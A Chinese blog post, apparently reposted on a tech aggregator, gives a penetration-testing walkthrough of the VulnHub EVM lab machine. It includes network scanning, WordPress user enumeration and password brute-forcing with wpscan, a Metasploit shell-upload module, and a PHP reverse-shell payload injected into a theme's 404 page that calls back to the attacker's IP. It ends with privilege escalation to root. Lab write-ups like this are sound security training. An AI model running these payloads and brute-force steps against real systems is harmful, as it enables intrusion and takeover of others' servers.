IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> vulnhub靶机EVM渗透笔记 -> 正文阅读

[PHP知识库]vulnhub靶机EVM渗透笔记

1.环境搭建

靶机环境搭建
攻击渗透机: kali IP地址:192.168.33.139
靶机:EVM IP地址未知
靶机下载地址:https://www.vulnhub.com/entry/evm-1,391/

2.信息收集

2.1 主机发现

我们要进行渗透,首先得知道目标靶机的IP地址,否则将无从做起

arp-scan -l

在这里插入图片描述
扫描获取到目标靶机IP地址为:192.168.33.146
若扫描不到目标靶机IP地址,可查阅我写的这篇文章进行解决https://blog.csdn.net/liver100day/article/details/119109320

2.2 端口扫描

既然知道了目标靶机IP地址,那就继续扫描获取目标靶机开放的端口,服务和版本信息

nmap -T4 -sV -A -O -p- 192.168.33.146  
#这样写的话扫描会花一部分时间,耗时并且被发现风险很大,建议仅在靶机练习时使用

在这里插入图片描述
在这里插入图片描述
扫描发现目标靶机开放了很多端口,有22端口(ssh服务),80端口(http服务),53端口,110端口,139端口,143端口和445端口和其他系统有关信息

53端口为DNS(Domain Name Server,域名服务器)服务器所开放,主要用于域名解析,DNS服务在NT系统中使用的最为广泛。通过DNS服务器可以实现域名与IP地址之间的转换,只要记住域名就可以快速访问网站。
110端口是为POP3(邮件协议3)服务开放的,POP2、POP3都是主要用于接收邮件的,目前POP3使用的比较多,许多服务器都同时支持POP2和POP3, 单单POP3服务在用户名和密码交换缓冲区溢出的漏洞就不少于20个,比如WebEasyMail POP3 Server合法用户名信息泄露漏洞,通过该漏洞远程攻击者可以验证用户账户的存在
139端口是NetBIOS Session端口,用来文件和打印共享,注意的是运行samba的unix机器也开放了139端口,功能一样。
143端口主要是用于“Internet Message AccessProtocol”v2(Internet消息访问协议,简称IMAP),和POP3一样,是用于电子邮件的接收的协议。
445端口默认开启microsoft-ds (TCP 445)端口允许远程用户连接。Microsoft 2000的microsoft-ds (TCP 445)端口在处理进行数据包时存在漏洞,可导致拒绝服务攻击。

2.3 访问80端口(http服务)

目标开启了80端口,这不明摆着让我们去访问一下吗?
在这里插入图片描述
发现是Apache的默认页面,并且发现了提示,提示存在一个名为“ WordPress”的易受攻击的目录,访问**/wordpress/,这里我能够访问,但是却等了很久,并无任何可用信息,那我们接下来就使用wpscan**
在这里插入图片描述

3.漏洞利用

3.1 使用wpscan爆破用户名和密码进行ssh登录

3.1.1 使用wpscan枚举/wordpress/网页里面的用户名
wpscan --url http://192.168.33.146/wordpress/ -e u

在这里插入图片描述
找到一个用户名:c0rrupt3d_brain
在这里插入图片描述

3.1.2 使用wpscan 爆破c0rrupt3d_brain用户的密码

wpscan自带的一个密码字典,在kali里的/usr/share/wordlists/rockyou.txt,不过第一次使用时需要进行解压
在这里插入图片描述

wpscan --url	http://192.168.33.146/wordpress/ -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt

在这里插入图片描述
在这里插入图片描述
爆破需要花费一点时间
在这里插入图片描述
爆破得到用户密码为:24992499
在这里插入图片描述

3.2 启动msf使用模块反弹shell

输入msfconsole打开msf
在这里插入图片描述
搜索wordpress对应版本

search wordpress 5.2.4

在这里插入图片描述
在被查找到的模块中使用exploit / unix / webapp / wp_admin_shell_upload模块
在这里插入图片描述

use exploit/unix/webapp/wp_admin_shell_upload

在这里插入图片描述
查看需要设置那些参数

show options

在这里插入图片描述
一一进行设置

set password 24992499
set username c0rrupt3d_brain
set rhost 192.168.33.146
set TARGETURI /wordpress

在这里插入图片描述
再次查看参数,确保参数输入正确
在这里插入图片描述
确保无误后,输入run运行,成功获取到目标shell
在这里插入图片描述

4 提权

切换至/home目录下,发现了**/root3r目录
在这里插入图片描述
发现了一个
.root_ password_ ssh. txt文件,查看这个文件
发现了
willy26**数据,这应该是root用户的密码,尝试切换至root用户

shell

使用python切换至交互式shell

python -c 'import pty;pty.spawn(:/bin/bash")'

在这里插入图片描述
切换成功,成功拿取到root权限,并且在root目录下找到了successful
拿到了root权限,那目标靶机就已经完全被你攻破了

3.3登录后台登录网页植入木马反弹shell

寻找目标网页后台登陆页面,使用刚刚获取到的账户密码进行登录

dirb http://192.168.33.146

在这里插入图片描述
成功找到后台登录界面,但我却怎么也访问不了。如果大家可以访问的话,下面是我的思路,大家可以去实验一下
使用刚刚获取到的用户名和密码进行登录
成功登录进去
根据流程,先点击Appearance,再点击Theme Editor,最后点击404页面代码
向404页面代码写入木马

$ip="192.168.33.129"; #这里是kali的IP地址
$port=9966; #填写一个未被占用的端口号
$sock = fsockopen($ip, $port);
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

写好之后保存
再打开一个终端,进行监听端口

nc -lvp 9966

在这里插入图片描述
随意访问一个不存在的页面,触发404页面代码
这样在你监听的终端就可以成功反弹shell

4.提权

提权操作就和上面的做法一致了
使用python切换至交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

成功切换,这样更利于我们进行操作
查看当前用户能否以root权限执行命令

sudo -l

看来不行,切换至/home目录下,发现了**/root3r**目录
在该目录下,仅发现了一个test.txt,猜测可能有隐藏文件(隐藏文件以.开头)

ls -la

发现了一个**.root_ password_ ssh. txt文件,查看这个文件
发现了
willy26**数据,这应该是root用户的密码,尝试切换至root用户

su root

切换成功,成功拿取到root权限,并且在root目录下找到了successful
拿到了root权限,那目标靶机就已经完全被你攻破了

5.总结

1.这靶机题型我已经做了很多次了,很简单的,不解在于为什么需要使用wpscan工具
2.为什么需要使用hi/exploit / unix / webapp / wp_admin_shell_upload模块

最近一直在学习,但是学习的东西很多很杂,于是便把自己的学习成果记录下来,便利自己,帮助他人。希望本篇文章能对你有所帮助,有错误的地方,欢迎指出!!!喜欢的话,不要忘记点赞哦!!!

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-08-03 10:56:29  更:2021-08-03 10:56:41 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/5 14:37:42-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码